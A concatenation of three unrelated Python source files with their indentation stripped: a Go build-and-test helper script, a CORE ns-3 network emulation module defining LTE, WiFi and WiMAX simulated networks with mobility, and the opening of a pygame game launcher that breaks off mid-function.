super(VetThread, self).run()
except:
self.exc_info = sys.exc_info()
def join_with_exception(self, reraise_exception):
self.join()
if reraise_exception and self.exc_info:
raise self.exc_info[0], self.exc_info[1], self.exc_info[2]
def do_compile_go(args):
raise_exception_from_vet = False
if args.vet:
run_vet = VetThread(target=do_vet, args=(args,))
run_vet.start()
try:
_do_compile_go(args)
raise_exception_from_vet = True
finally:
if args.vet:
run_vet.join_with_exception(raise_exception_from_vet)
def do_compile_asm(args):
assert(len(args.srcs) == 1 and len(args.asm_srcs) == 1)
cmd = [args.go_asm, '-trimpath', args.arc_source_root]
cmd += ['-I', args.output_root, '-I', os.path.join(args.pkg_root, 'include')]
cmd += ['-D', 'GOOS_' + args.targ_os, '-D', 'GOARCH_' + args.targ_arch, '-o', args.output]
if args.asm_flags:
cmd += args.asm_flags
cmd += args.asm_srcs
call(cmd, args.build_root)
def do_link_lib(args):
if len(args.asm_srcs) > 0:
asmargs = copy_args(args)
asmargs.asmhdr = os.path.join(asmargs.output_root, 'go_asm.h')
do_compile_go(asmargs)
for src in asmargs.asm_srcs:
asmargs.srcs = [src]
asmargs.asm_srcs = [src]
asmargs.output = os.path.join(asmargs.output_root, os.path.basename(src) + '.o')
do_compile_asm(asmargs)
args.objects.append(asmargs.output)
else:
do_compile_go(args)
if args.objects:
cmd = [args.go_pack, 'r', args.output] + args.objects + args.sysos
call(cmd, args.build_root)
def do_link_exe(args):
assert args.extld is not None
assert args.non_local_peers is not None
compile_args = copy_args(args)
compile_args.output = os.path.join(args.output_root, 'main.a')
compile_args.real_import_path = compile_args.import_path
compile_args.import_path = 'main'
if args.vcs and os.path.isfile(compile_args.vcs):
build_info = os.path.join('library', 'go', 'core', 'buildinfo')
if any(map(lambda x: x.startswith(build_info), compile_args.peers)):
compile_args.go_srcs.append(compile_args.vcs)
do_link_lib(compile_args)
cmd = [args.go_link, '-o', args.output]
import_config_name = create_import_config(args.peers + args.non_local_peers, False, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
if args.link_flags:
cmd += args.link_flags
cmd += ['-buildmode=exe', '-extld={}'.format(args.extld)]
extldflags = []
if args.extldflags is not None:
extldflags += args.extldflags
if args.cgo_peers is not None and len(args.cgo_peers) > 0:
is_group = args.targ_os == 'linux'
if is_group:
extldflags.append('-Wl,--start-group')
extldflags.extend(os.path.join(args.build_root, x) for x in args.cgo_peers)
if is_group:
extldflags.append('-Wl,--end-group')
if len(extldflags) > 0:
cmd.append('-extldflags=' + ' '.join(extldflags))
cmd.append(compile_args.output)
call(cmd, args.build_root)
def gen_cover_info(args):
lines = []
lines.extend([
"""
var (
coverCounters = make(map[string][]uint32)
coverBlocks = make(map[string][]testing.CoverBlock)
)
""",
'func init() {',
])
for var, file in (x.split(':') for x in args.cover_info):
lines.append(' coverRegisterFile("{file}", _cover0.{var}.Count[:], _cover0.{var}.Pos[:], _cover0.{var}.NumStmt[:])'.format(file=file, var=var))
lines.extend([
'}',
"""
func coverRegisterFile(fileName string, counter []uint32, pos []uint32, numStmts []uint16) {
if 3*len(counter) != len(pos) || len(counter) != len(numStmts) {
panic("coverage: mismatched sizes")
}
if coverCounters[fileName] != nil {
// Already registered.
return
}
coverCounters[fileName] = counter
block := make([]testing.CoverBlock, len(counter))
for i := range counter {
block[i] = testing.CoverBlock{
Line0: pos[3*i+0],
Col0: uint16(pos[3*i+2]),
Line1: pos[3*i+1],
Col1: uint16(pos[3*i+2]>>16),
Stmts: numStmts[i],
}
}
coverBlocks[fileName] = block
}
""",
])
return lines
def gen_test_main(args, test_lib_args, xtest_lib_args):
assert args and (test_lib_args or xtest_lib_args)
test_miner = args.test_miner
test_module_path = test_lib_args.import_path if test_lib_args else xtest_lib_args.import_path
is_cover = args.cover_info and len(args.cover_info) > 0
# Prepare GOPATH
# $BINDIR
# |- __go__
# |- src
# |- pkg
# |- ${TARGET_OS}_${TARGET_ARCH}
go_path_root = os.path.join(args.output_root, '__go__')
test_src_dir = os.path.join(go_path_root, 'src')
target_os_arch = '_'.join([args.targ_os, args.targ_arch])
test_pkg_dir = os.path.join(go_path_root, 'pkg', target_os_arch, os.path.dirname(test_module_path))
os.makedirs(test_pkg_dir)
my_env = os.environ.copy()
my_env['GOROOT'] = ''
my_env['GOPATH'] = go_path_root
my_env['GOARCH'] = args.targ_arch
my_env['GOOS'] = args.targ_os
tests = []
xtests = []
os_symlink = get_symlink_or_copyfile()
# Get the list of "internal" tests
if test_lib_args:
os.makedirs(os.path.join(test_src_dir, test_module_path))
os_symlink(test_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(test_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', test_module_path]
tests = filter(lambda x: len(x) > 0, (call(cmd, test_lib_args.output_root, my_env) or '').strip().split('\n'))
test_main_found = '#TestMain' in tests
# Get the list of "external" tests
if xtest_lib_args:
xtest_module_path = xtest_lib_args.import_path
os.makedirs(os.path.join(test_src_dir, xtest_module_path))
os_symlink(xtest_lib_args.output, os.path.join(test_pkg_dir, os.path.basename(xtest_module_path) + '.a'))
cmd = [test_miner, '-benchmarks', '-tests', xtest_module_path]
xtests = filter(lambda x: len(x) > 0, (call(cmd, xtest_lib_args.output_root, my_env) or '').strip().split('\n'))
xtest_main_found = '#TestMain' in xtests
test_main_package = None
if test_main_found and xtest_main_found:
assert False, 'multiple definition of TestMain'
elif test_main_found:
test_main_package = '_test'
elif xtest_main_found:
test_main_package = '_xtest'
shutil.rmtree(go_path_root)
lines = ['package main', '', 'import (']
if test_main_package is None:
lines.append(' "os"')
lines.extend([' "testing"', ' "testing/internal/testdeps"'])
if len(tests) > 0:
lines.append(' _test "{}"'.format(test_module_path))
if len(xtests) > 0:
lines.append(' _xtest "{}"'.format(xtest_module_path))
if is_cover:
lines.append(' _cover0 "{}"'.format(test_module_path))
lines.extend([')', ''])
for kind in ['Test', 'Benchmark', 'Example']:
lines.append('var {}s = []testing.Internal{}{{'.format(kind.lower(), kind))
for test in list(filter(lambda x: x.startswith(kind), tests)):
lines.append(' {{"{test}", _test.{test}}},'.format(test=test))
for test in list(filter(lambda x: x.startswith(kind), xtests)):
lines.append(' {{"{test}", _xtest.{test}}},'.format(test=test))
lines.extend(['}', ''])
if is_cover:
lines.extend(gen_cover_info(args))
lines.append('func main() {')
if is_cover:
lines.extend([
' testing.RegisterCover(testing.Cover{',
' Mode: "set",',
' Counters: coverCounters,',
' Blocks: coverBlocks,',
' CoveredPackages: "",',
' })',
])
lines.extend([
' m := testing.MainStart(testdeps.TestDeps{}, tests, benchmarks, examples)'
'',
])
if test_main_package:
lines.append(' {}.TestMain(m)'.format(test_main_package))
else:
lines.append(' os.Exit(m.Run())')
lines.extend(['}', ''])
content = '\n'.join(lines)
# print >>sys.stderr, content
return content
def do_link_test(args):
assert args.srcs or args.xtest_srcs
assert args.test_miner is not None
test_module_path = get_source_path(args)
test_import_path, _ = get_import_path(test_module_path)
test_lib_args = None
xtest_lib_args = None
if args.srcs:
test_lib_args = copy_args(args)
test_lib_args.output = os.path.join(args.output_root, 'test.a')
test_lib_args.vet_report_output = vet_report_output_name(test_lib_args.output)
test_lib_args.module_path = test_module_path
test_lib_args.import_path = test_import_path
do_link_lib(test_lib_args)
if args.xtest_srcs:
xtest_lib_args = copy_args(args)
xtest_lib_args.srcs = xtest_lib_args.xtest_srcs
classify_srcs(xtest_lib_args.srcs, xtest_lib_args)
xtest_lib_args.output = os.path.join(args.output_root, 'xtest.a')
xtest_lib_args.vet_report_output = vet_report_output_name(xtest_lib_args.output)
xtest_lib_args.module_path = test_module_path + '_test'
xtest_lib_args.import_path = test_import_path + '_test'
if test_lib_args:
xtest_lib_args.module_map[test_import_path] = test_lib_args.output
do_link_lib(xtest_lib_args)
test_main_content = gen_test_main(args, test_lib_args, xtest_lib_args)
test_main_name = os.path.join(args.output_root, '_test_main.go')
with open(test_main_name, "w") as f:
f.write(test_main_content)
test_args = copy_args(args)
test_args.srcs = [test_main_name]
if test_args.test_import_path is None:
# it seems that we can do it unconditionally, but this kind
# of mangling doesn't really looks good to me and we leave it
# for pure GO_TEST module
test_args.module_path = test_args.module_path + '___test_main__'
test_args.import_path = test_args.import_path + '___test_main__'
classify_srcs(test_args.srcs, test_args)
if test_lib_args:
test_args.module_map[test_lib_args.import_path] = test_lib_args.output
if xtest_lib_args:
test_args.module_map[xtest_lib_args.import_path] = xtest_lib_args.output
if args.vet:
dump_vet_report_for_tests(test_args, test_lib_args, xtest_lib_args)
test_args.vet = False
do_link_exe(test_args)
if __name__ == '__main__':
parser = argparse.ArgumentParser(prefix_chars='+')
parser.add_argument('++mode', choices=['lib', 'exe', 'test'], required=True)
parser.add_argument('++srcs', nargs='*', required=True)
parser.add_argument('++cgo-srcs', nargs='*')
parser.add_argument('++test_srcs', nargs='*')
parser.add_argument('++xtest_srcs', nargs='*')
parser.add_argument('++cover_info', nargs='*')
parser.add_argument('++output', nargs='?', default=None)
parser.add_argument('++build-root', required=True)
parser.add_argument('++output-root', required=True)
parser.add_argument('++tools-root', required=True)
parser.add_argument('++host-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++host-arch', choices=['amd64'], required=True)
parser.add_argument('++targ-os', choices=['linux', 'darwin', 'windows'], required=True)
parser.add_argument('++targ-arch', choices=['amd64', 'x86'], required=True)
parser.add_argument('++peers', nargs='*')
parser.add_argument('++non-local-peers', nargs='*')
parser.add_argument('++cgo-peers', nargs='*')
parser.add_argument('++asmhdr', nargs='?', default=None)
parser.add_argument('++test-import-path', nargs='?')
parser.add_argument('++test-miner', nargs='?')
parser.add_argument('++arc-project-prefix', nargs='?', default=arc_project_prefix)
parser.add_argument('++std-lib-prefix', nargs='?', default=std_lib_prefix)
parser.add_argument('++extld', nargs='?', default=None)
parser.add_argument('++extldflags', nargs='+', default=None)
parser.add_argument('++goversion', required=True)
parser.add_argument('++asm-flags', nargs='*')
parser.add_argument('++compile-flags', nargs='*')
parser.add_argument('++link-flags', nargs='*')
parser.add_argument('++vcs', nargs='?', default=None)
parser.add_argument('++vet', nargs='?', const=True, default=False)
parser.add_argument('++vet-flags', nargs='*', default=None)
parser.add_argument('++arc-source-root')
args = parser.parse_args()
# Temporary work around for noauto
if args.cgo_srcs and len(args.cgo_srcs) > 0:
cgo_srcs_set = set(args.cgo_srcs)
args.srcs = list(filter(lambda x: x not in cgo_srcs_set, args.srcs))
args.pkg_root = os.path.join(str(args.tools_root), 'pkg')
args.tool_root = os.path.join(args.pkg_root, 'tool', '{}_{}'.format(args.host_os, args.host_arch))
args.go_compile = os.path.join(args.tool_root, 'compile')
args.go_cgo = os.path.join(args.tool_root, 'cgo')
args.go_link = os.path.join(args.tool_root, 'link')
args.go_asm = os.path.join(args.tool_root, 'asm')
args.go_pack = os.path.join(args.tool_root, 'pack')
args.go_vet = os.path.join(args.tool_root, 'vet') if args.vet is True else args.vet
args.output = os.path.normpath(args.output)
args.vet_report_output = vet_report_output_name(args.output)
args.build_root = os.path.normpath(args.build_root) + os.path.sep
args.output_root = os.path.normpath(args.output_root)
args.import_map = {}
args.module_map = {}
assert args.mode == 'test' or args.test_srcs is None and args.xtest_srcs is None
# add lexical oreder by basename for go sources
args.srcs.sort(key=lambda x: os.path.basename(x))
if args.test_srcs:
args.srcs += sorted(args.test_srcs, key=lambda x: os.path.basename(x))
del args.test_srcs
if args.xtest_srcs:
args.xtest_srcs.sort(key=lambda x: os.path.basename(x))
arc_project_prefix = args.arc_project_prefix
std_lib_prefix = args.std_lib_prefix
# compute root relative module dir path
assert args.output is None or args.output_root == os.path.dirname(args.output)
assert args.output_root.startswith(args.build_root)
args.module_path = args.output_root[len(args.build_root):]
assert len(args.module_path) > 0
args.import_path, args.is_std = get_import_path(args.module_path)
classify_srcs(args.srcs, args)
assert args.asmhdr is None or args.word == 'go'
try:
os.unlink(args.output)
except OSError:
pass
# We are going to support only 'lib', 'exe' and 'cgo' build modes currently
# and as a result we are going to generate only one build node per module
# (or program)
dispatch = {
'lib': do_link_lib,
'exe': do_link_exe,
'test': do_link_test
}
exit_code = 1
try:
dispatch[args.mode](args)
exit_code = 0
except KeyError:
print >>sys.stderr, 'Unknown build mode [{}]...'.format(args.mode)
except subprocess.CalledProcessError as e:
print >>sys.stderr, '{} returned non-zero exit code {}. stop.'.format(' '.join(e.cmd), e.returncode)
print >>sys.stderr, e.output
exit_code = e.returncode
except Exception as e:
print >>sys.stderr, "Unhandled exception [{}]...".format(str(e))
sys.exit(exit_code)
|
obj.py | #
# CORE
# Copyright (c)2011-2013 the Boeing Company.
# See the LICENSE file included in this directory.
#
# author: Jeff Ahrenholz <jeffrey.m.ahrenholz@boeing.com>
#
'''
ns3.py: defines classes for running emulations with ns-3 simulated networks.
'''
import sys, os, threading, time
from core.netns.nodes import CoreNode
from core.coreobj import PyCoreNet
from core.session import Session
from core.misc import ipaddr
from core.constants import *
from core.misc.utils import maketuple, check_call
from core.api import coreapi
from core.mobility import WayPointMobility
try:
import ns.core
except Exception, e:
print "Could not locate the ns-3 Python bindings!"
print "Try running again from within the ns-3 './waf shell'\n"
raise Exception, e
import ns.lte
import ns.mobility
import ns.network
import ns.internet
import ns.tap_bridge
import ns.wifi
import ns.wimax
ns.core.GlobalValue.Bind("SimulatorImplementationType",
ns.core.StringValue("ns3::RealtimeSimulatorImpl"))
ns.core.GlobalValue.Bind("ChecksumEnabled", ns.core.BooleanValue("true"))
class CoreNs3Node(CoreNode, ns.network.Node):
''' The CoreNs3Node is both a CoreNode backed by a network namespace and
an ns-3 Node simulator object. When linked to simulated networks, the TunTap
device will be used.
'''
def __init__(self, *args, **kwds):
ns.network.Node.__init__(self)
objid = self.GetId() + 1 # ns-3 ID starts at 0, CORE uses 1
if 'objid' not in kwds:
kwds['objid'] = objid
CoreNode.__init__(self, *args, **kwds)
def newnetif(self, net = None, addrlist = [], hwaddr = None,
ifindex = None, ifname = None):
''' Add a network interface. If we are attaching to a CoreNs3Net, this
will be a TunTap. Otherwise dispatch to CoreNode.newnetif().
'''
if not isinstance(net, CoreNs3Net):
return CoreNode.newnetif(self, net, addrlist, hwaddr, ifindex,
ifname)
ifindex = self.newtuntap(ifindex = ifindex, ifname = ifname, net = net)
self.attachnet(ifindex, net)
netif = self.netif(ifindex)
netif.sethwaddr(hwaddr)
for addr in maketuple(addrlist):
netif.addaddr(addr)
addrstr = netif.addrlist[0]
(addr, mask) = addrstr.split('/')
tap = net._tapdevs[netif]
tap.SetAttribute("IpAddress",
ns.network.Ipv4AddressValue(ns.network.Ipv4Address(addr)))
tap.SetAttribute("Netmask",
ns.network.Ipv4MaskValue(ns.network.Ipv4Mask("/" + mask)))
ns.core.Simulator.Schedule(ns.core.Time('0'), netif.install)
return ifindex
def getns3position(self):
''' Return the ns-3 (x, y, z) position of a node.
'''
try:
mm = self.GetObject(ns.mobility.MobilityModel.GetTypeId())
pos = mm.GetPosition()
return (pos.x, pos.y, pos.z)
except AttributeError:
self.warn("ns-3 mobility model not found")
return (0,0,0)
def setns3position(self, x, y, z):
''' Set the ns-3 (x, y, z) position of a node.
'''
try:
mm = self.GetObject(ns.mobility.MobilityModel.GetTypeId())
if z is None:
z = 0.0
pos = mm.SetPosition(ns.core.Vector(x, y, z))
except AttributeError:
self.warn("ns-3 mobility model not found, not setting position")
class CoreNs3Net(PyCoreNet):
''' The CoreNs3Net is a helper PyCoreNet object. Networks are represented
entirely in simulation with the TunTap device bridging the emulated and
simulated worlds.
'''
apitype = coreapi.CORE_NODE_WLAN
linktype = coreapi.CORE_LINK_WIRELESS
type = "wlan" # icon used
def __init__(self, session, objid = None, name = None, verbose = False,
start = True, policy = None):
PyCoreNet.__init__(self, session, objid, name)
self.tapbridge = ns.tap_bridge.TapBridgeHelper()
self._ns3devs = {}
self._tapdevs = {}
def attach(self, netif):
''' Invoked from netif.attach(). Create a TAP device using the TapBridge
object. Call getns3dev() to get model-specific device.
'''
self._netif[netif] = netif
self._linked[netif] = {}
ns3dev = self.getns3dev(netif.node)
tap = self.tapbridge.Install(netif.node, ns3dev)
tap.SetMode(ns.tap_bridge.TapBridge.CONFIGURE_LOCAL)
tap.SetAttribute("DeviceName", ns.core.StringValue(netif.localname))
self._ns3devs[netif] = ns3dev
self._tapdevs[netif] = tap
def getns3dev(self, node):
''' Implement depending on network helper. Install this network onto
the given node and return the device. Register the ns3 device into
self._ns3devs
'''
raise NotImplementedError
def findns3dev(self, node):
''' Given a node, return the interface and ns3 device associated with
this network.
'''
for netif in node.netifs():
if netif in self._ns3devs:
return netif, self._ns3devs[netif]
return None, None
def shutdown(self):
''' Session.shutdown() will invoke this.
'''
pass
def usecorepositions(self):
''' Set position callbacks for interfaces on this net so the CORE GUI
can update the ns-3 node position when moved with the mouse.
'''
for netif in self.netifs():
netif.poshook = self.setns3position
def setns3position(self, netif, x, y, z):
#print "setns3position: %s (%s, %s, %s)" % (netif.node.name, x, y, z)
netif.node.setns3position(x, y, z)
class Ns3LteNet(CoreNs3Net):
def __init__(self, *args, **kwds):
''' Uses a LteHelper to create an ns-3 based LTE network.
'''
CoreNs3Net.__init__(self, *args, **kwds)
self.lte = ns.lte.LteHelper()
# enhanced NodeB node list
self.enbnodes = []
self.dlsubchannels = None
self.ulsubchannels = None
def setsubchannels(self, downlink, uplink):
''' Set the downlink/uplink subchannels, which are a list of ints.
These should be set prior to using CoreNs3Node.newnetif().
'''
self.dlsubchannels = downlink
self.ulsubchannels = uplink
def setnodeb(self, node):
''' Mark the given node as a nodeb (base transceiver station)
'''
self.enbnodes.append(node)
def linknodeb(self, node, nodeb, mob, mobb):
''' Register user equipment with a nodeb.
Optionally install mobility model while we have the ns-3 devs handy.
'''
(tmp, nodebdev) = self.findns3dev(nodeb)
(tmp, dev) = self.findns3dev(node)
if nodebdev is None or dev is None:
raise KeyError, "ns-3 device for node not found"
self.lte.RegisterUeToTheEnb(dev, nodebdev)
if mob:
self.lte.AddMobility(dev.GetPhy(), mob)
if mobb:
self.lte.AddDownlinkChannelRealization(mobb, mob, dev.GetPhy())
def getns3dev(self, node):
''' Get the ns3 NetDevice using the LteHelper.
'''
if node in self.enbnodes:
devtype = ns.lte.LteHelper.DEVICE_TYPE_ENODEB
else:
devtype = ns.lte.LteHelper.DEVICE_TYPE_USER_EQUIPMENT
nodes = ns.network.NodeContainer(node)
devs = self.lte.Install(nodes, devtype)
devs.Get(0).GetPhy().SetDownlinkSubChannels(self.dlsubchannels)
devs.Get(0).GetPhy().SetUplinkSubChannels(self.ulsubchannels)
return devs.Get(0)
def attach(self, netif):
''' Invoked from netif.attach(). Create a TAP device using the TapBridge
object. Call getns3dev() to get model-specific device.
'''
self._netif[netif] = netif
self._linked[netif] = {}
ns3dev = self.getns3dev(netif.node)
self.tapbridge.SetAttribute("Mode", ns.core.StringValue("UseLocal"))
#self.tapbridge.SetAttribute("Mode",
# ns.core.IntegerValue(ns.tap_bridge.TapBridge.USE_LOCAL))
tap = self.tapbridge.Install(netif.node, ns3dev)
#tap.SetMode(ns.tap_bridge.TapBridge.USE_LOCAL)
print "using TAP device %s for %s/%s" % \
(netif.localname, netif.node.name, netif.name)
check_call(['tunctl', '-t', netif.localname, '-n'])
#check_call([IP_BIN, 'link', 'set', 'dev', netif.localname, \
# 'address', '%s' % netif.hwaddr])
check_call([IP_BIN, 'link', 'set', netif.localname, 'up'])
tap.SetAttribute("DeviceName", ns.core.StringValue(netif.localname))
self._ns3devs[netif] = ns3dev
self._tapdevs[netif] = tap
class Ns3WifiNet(CoreNs3Net):
def __init__(self, *args, **kwds):
''' Uses a WifiHelper to create an ns-3 based Wifi network.
'''
rate = kwds.pop('rate', 'OfdmRate54Mbps')
CoreNs3Net.__init__(self, *args, **kwds)
self.wifi = ns.wifi.WifiHelper().Default()
self.wifi.SetStandard(ns.wifi.WIFI_PHY_STANDARD_80211a)
self.wifi.SetRemoteStationManager("ns3::ConstantRateWifiManager",
"DataMode",
ns.core.StringValue(rate),
"NonUnicastMode",
ns.core.StringValue(rate))
self.mac = ns.wifi.NqosWifiMacHelper.Default()
self.mac.SetType("ns3::AdhocWifiMac")
channel = ns.wifi.YansWifiChannelHelper.Default()
self.phy = ns.wifi.YansWifiPhyHelper.Default()
self.phy.SetChannel(channel.Create())
def getns3dev(self, node):
''' Get the ns3 NetDevice using the WifiHelper.
'''
devs = self.wifi.Install(self.phy, self.mac, node)
return devs.Get(0)
class Ns3WimaxNet(CoreNs3Net):
def __init__(self, *args, **kwds):
CoreNs3Net.__init__(self, *args, **kwds)
self.wimax = ns.wimax.WimaxHelper()
self.scheduler = ns.wimax.WimaxHelper.SCHED_TYPE_SIMPLE
self.phy = ns.wimax.WimaxHelper.SIMPLE_PHY_TYPE_OFDM
# base station node list
self.bsnodes = []
def setbasestation(self, node):
self.bsnodes.append(node)
def getns3dev(self, node):
if node in self.bsnodes:
devtype = ns.wimax.WimaxHelper.DEVICE_TYPE_BASE_STATION
else:
devtype = ns.wimax.WimaxHelper.DEVICE_TYPE_SUBSCRIBER_STATION
nodes = ns.network.NodeContainer(node)
devs = self.wimax.Install(nodes, devtype, self.phy, self.scheduler)
if node not in self.bsnodes:
devs.Get(0).SetModulationType(ns.wimax.WimaxPhy.MODULATION_TYPE_QAM16_12)
# debug
self.wimax.EnableAscii("wimax-device-%s" % node.name, devs)
return devs.Get(0)
@staticmethod
def ipv4netifaddr(netif):
for addr in netif.addrlist:
if ':' in addr:
continue # skip ipv6
ip = ns.network.Ipv4Address(addr.split('/')[0])
mask = ns.network.Ipv4Mask('/' + addr.split('/')[1])
return (ip, mask)
return (None, None)
def addflow(self, node1, node2, upclass, downclass):
''' Add a Wimax service flow between two nodes.
'''
(netif1, ns3dev1) = self.findns3dev(node1)
(netif2, ns3dev2) = self.findns3dev(node2)
if not netif1 or not netif2:
raise ValueError, "interface not found"
(addr1, mask1) = self.ipv4netifaddr(netif1)
(addr2, mask2) = self.ipv4netifaddr(netif2)
clargs1 = (addr1, mask1, addr2, mask2) + downclass
clargs2 = (addr2, mask2, addr1, mask1) + upclass
clrec1 = ns.wimax.IpcsClassifierRecord(*clargs1)
clrec2 = ns.wimax.IpcsClassifierRecord(*clargs2)
ns3dev1.AddServiceFlow( \
self.wimax.CreateServiceFlow(ns.wimax.ServiceFlow.SF_DIRECTION_DOWN,
ns.wimax.ServiceFlow.SF_TYPE_RTPS, clrec1))
ns3dev1.AddServiceFlow( \
self.wimax.CreateServiceFlow(ns.wimax.ServiceFlow.SF_DIRECTION_UP,
ns.wimax.ServiceFlow.SF_TYPE_RTPS, clrec2))
ns3dev2.AddServiceFlow( \
self.wimax.CreateServiceFlow(ns.wimax.ServiceFlow.SF_DIRECTION_DOWN,
ns.wimax.ServiceFlow.SF_TYPE_RTPS, clrec2))
ns3dev2.AddServiceFlow( \
self.wimax.CreateServiceFlow(ns.wimax.ServiceFlow.SF_DIRECTION_UP,
ns.wimax.ServiceFlow.SF_TYPE_RTPS, clrec1))
class Ns3Session(Session):
''' A Session that starts an ns-3 simulation thread.
'''
def __init__(self, persistent = False, duration=600):
self.duration = duration
self.nodes = ns.network.NodeContainer()
self.mobhelper = ns.mobility.MobilityHelper()
Session.__init__(self, persistent = persistent)
def run(self, vis=False):
''' Run the ns-3 simulation and return the simulator thread.
'''
def runthread():
ns.core.Simulator.Stop(ns.core.Seconds(self.duration))
print "running ns-3 simulation for %d seconds" % self.duration
if vis:
try:
import visualizer
except ImportError:
print "visualizer is not available"
ns.core.Simulator.Run()
else:
visualizer.start()
else:
ns.core.Simulator.Run()
#self.evq.run() # event queue may have WayPointMobility events
self.setstate(coreapi.CORE_EVENT_RUNTIME_STATE, info=True,
sendevent=True)
t = threading.Thread(target = runthread)
t.daemon = True
t.start()
return t
def shutdown(self):
# TODO: the following line tends to segfault ns-3 (and therefore
# core-daemon)
ns.core.Simulator.Destroy()
Session.shutdown(self)
def addnode(self, name):
''' A convenience helper for Session.addobj(), for adding CoreNs3Nodes
to this session. Keeps a NodeContainer for later use.
'''
n = self.addobj(cls = CoreNs3Node, name=name)
self.nodes.Add(n)
return n
def setupconstantmobility(self):
''' Install a ConstantPositionMobilityModel.
'''
palloc = ns.mobility.ListPositionAllocator()
for i in xrange(self.nodes.GetN()):
(x, y, z) = ((100.0 * i) + 50, 200.0, 0.0)
palloc.Add(ns.core.Vector(x, y, z))
node = self.nodes.Get(i)
node.position.set(x, y, z)
self.mobhelper.SetPositionAllocator(palloc)
self.mobhelper.SetMobilityModel("ns3::ConstantPositionMobilityModel")
self.mobhelper.Install(self.nodes)
def setuprandomwalkmobility(self, bounds, time=10, speed=25.0):
''' Set up the random walk mobility model within a bounding box.
- bounds is the max (x, y, z) boundary
- time is the number of seconds to maintain the current speed
and direction
- speed is the maximum speed, with node speed randomly chosen
from [0, speed]
'''
(x, y, z) = map(float, bounds)
self.mobhelper.SetPositionAllocator("ns3::RandomBoxPositionAllocator",
"X",
ns.core.StringValue("ns3::UniformRandomVariable[Min=0|Max=%s]" % x),
"Y",
ns.core.StringValue("ns3::UniformRandomVariable[Min=0|Max=%s]" % y),
"Z",
ns.core.StringValue("ns3::UniformRandomVariable[Min=0|Max=%s]" % z))
self.mobhelper.SetMobilityModel("ns3::RandomWalk2dMobilityModel",
"Mode", ns.core.StringValue("Time"),
"Time", ns.core.StringValue("%ss" % time),
"Speed",
ns.core.StringValue("ns3::UniformRandomVariable[Min=0|Max=%s]" \
% speed),
"Bounds", ns.core.StringValue("0|%s|0|%s" % (x, y)))
self.mobhelper.Install(self.nodes)
def startns3mobility(self, refresh_ms=300):
''' Start a thread that updates CORE nodes based on their ns-3
positions.
'''
self.setstate(coreapi.CORE_EVENT_INSTANTIATION_STATE)
self.mobilitythread = threading.Thread(
target=self.ns3mobilitythread,
args=(refresh_ms,))
self.mobilitythread.daemon = True
self.mobilitythread.start()
def ns3mobilitythread(self, refresh_ms):
''' Thread target that updates CORE nodes every refresh_ms based on
their ns-3 positions.
'''
valid_states = (coreapi.CORE_EVENT_RUNTIME_STATE,
coreapi.CORE_EVENT_INSTANTIATION_STATE)
while self.getstate() in valid_states:
for i in xrange(self.nodes.GetN()):
node = self.nodes.Get(i)
(x, y, z) = node.getns3position()
if (x, y, z) == node.position.get():
continue
# from WayPointMobility.setnodeposition(node, x, y, z)
node.position.set(x, y, z)
msg = node.tonodemsg(flags=0)
self.broadcastraw(None, msg)
self.sdt.updatenode(node.objid, flags=0, x=x, y=y, z=z)
time.sleep(0.001 * refresh_ms)
def setupmobilitytracing(self, net, filename, nodes, verbose=False):
''' Start a tracing thread using the ASCII output from the ns3
mobility helper.
'''
net.mobility = WayPointMobility(session=self, objid=net.objid,
verbose=verbose, values=None)
net.mobility.setendtime()
net.mobility.refresh_ms = 300
net.mobility.empty_queue_stop = False
of = ns.network.OutputStreamWrapper(filename, filemode=777)
self.mobhelper.EnableAsciiAll(of)
self.mobilitytracethread = threading.Thread(target=self.mobilitytrace,
args=(net, filename, nodes, verbose))
self.mobilitytracethread.daemon = True
self.mobilitytracethread.start()
def mobilitytrace(self, net, filename, nodes, verbose):
nodemap = {}
# move nodes to initial positions
for node in nodes:
(x,y,z) = node.getns3position()
net.mobility.setnodeposition(node, x, y, z)
nodemap[node.GetId()] = node
if verbose:
self.info("mobilitytrace opening '%s'" % filename)
try:
f = open(filename)
f.seek(0,2)
except Exception, e:
self.warn("mobilitytrace error opening '%s': %s" % (filename, e))
sleep = 0.001
kickstart = True
while True:
if self.getstate() != coreapi.CORE_EVENT_RUNTIME_STATE:
break
line = f.readline()
if not line:
time.sleep(sleep)
if sleep < 1.0:
sleep += 0.001
continue
sleep = 0.001
items = dict(map(lambda x: x.split('='), line.split()))
if verbose:
self.info("trace: %s %s %s" % \
(items['node'], items['pos'], items['vel']))
(x, y, z) = map(float, items['pos'].split(':'))
vel = map(float, items['vel'].split(':'))
node = nodemap[int(items['node'])]
net.mobility.addwaypoint(time=0, nodenum=node.objid,
x=x, y=y, z=z, speed=vel)
if kickstart:
kickstart = False
self.evq.add_event(0, net.mobility.start)
self.evq.run()
else:
if net.mobility.state != net.mobility.STATE_RUNNING:
net.mobility.state = net.mobility.STATE_RUNNING
self.evq.add_event(0, net.mobility.runround)
f.close()
|
launcher.py | import time
start = time.perf_counter()
import os
import sys
#disable python warnings
if not sys.warnoptions:
import warnings
warnings.simplefilter("ignore")
#route error output to file
sys.stderr = open('log.txt', 'w+')
#suppress pygame welcome message
oldStdout = sys.stdout
sys.stdout = open(os.devnull, 'w')
import pygame
sys.stdout = oldStdout
import pygame
import PIL
import requests
import wmi
import pywin
import threading
import repair
from resourceManager import ResourceManager
from texture import Texture
from sound import Sound
from Utils.graphics import Resolutions, ConvertImage, DimImage, GetScale, GetScalingFactor
from Utils.performance import FreeMem, TimedGarbageCollect, StopGCThreads
from Utils.game import Stats
from Utils.other import Ask
from preferencies import Preferencies
import pygameWindow
from pygameWindow import WindowFlags
from Utils.debug import Log, LogLevel
from Utils import debug
#check maps folder
if not os.path.exists('./Resources/maps'):
print('Directory maps is missing. Creating directory.')
try:
os.mkdir('./Resources/maps')
os.mkdir('./Resources/maps/editor')
except OSError:
print('Error! Cannot create directories.')
raise
print('Directory created.')
#scale
#used to change size of objects depending on used resolution
#temporary set to 1 until making better method of calculating it
scale = 1
#user preferencies
prefs = None
#####GAME STATS#####
#circle approach rate
AR = None
#circle size
CS = None
#hp drop
HP = None
#raw stats
AR_raw = 5
CS_raw = 5
HP_raw = 5
#####STATICS#####
#folder paths
texPath = 'Resources/textures/'
mapsPath = 'Resources/maps/'
soundsPath = 'Resources/sounds/'
#resource managers
mainResManager = ResourceManager("mainManager", 0)
#game window
mainWindow = None
def LoadPreferencies():
try:
global prefs
